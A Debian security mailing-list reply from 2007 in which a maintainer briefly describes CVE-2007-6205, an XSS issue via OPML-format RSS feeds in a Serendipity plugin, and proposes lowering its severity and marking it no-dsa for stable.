On Tuesday 11 December 2007 09:37, nion@alioth.debian.org wrote: > Log: > CVE-2007-6205 fixed in serendipity 1.2.1-1 > CVE-2007-6205 > RESERVED > + - serendipity 1.2.1-1 (low) This issue is: XSS through remote RSS feeds. I would rate it as unimportant myself: it requires using this specific plugin, only with an OPML-format feed, and then the remote maintainer of that feed needs to be interested in getting your password, and will need to put malicious script into the url-parameter of that feed (breaking the feed for everyone else, so it's noticable and tracable who did it). To me this scenario sounds highly unlikely. I propose to mark it as no-dsa for stable, and even to lower the severity to unimportant. Comments? Thijs
Attachment:
pgp07kuKmoUHR.pgp
Description: PGP signature